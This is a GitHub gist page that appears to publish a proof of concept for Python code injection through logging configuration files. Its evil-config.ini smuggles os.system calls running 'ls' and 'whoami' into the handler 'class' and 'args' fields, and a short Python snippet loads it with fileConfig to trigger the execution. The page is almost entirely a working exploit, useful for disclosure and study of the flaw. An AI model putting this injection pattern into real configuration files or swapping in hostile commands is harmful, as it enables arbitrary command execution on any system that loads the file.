Skip to content

Instantly share code, notes, and snippets.

@dhondta

dhondta/evil-config.ini

Last active May 1, 2019
Embed
What would you like to do?
Proof-of-Concept for logging Python code injection
[loggers]
keys=root
[handlers]
keys=stream_handler
[formatters]
keys=formatter
[logger_root]
level=DEBUG
handlers=stream_handler
[handler_stream_handler]
class=__import__('os').system('ls') or StreamHandler
level=DEBUG
formatter=formatter
args=(__import__('os').system('whoami') or sys.stderr, )
[formatter_formatter]
format=%(name)-12s %(levelname)-8s %(message)s
from logging.config import fileConfig
# trigger the vulnerability
fileConfig("evil-config.ini")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment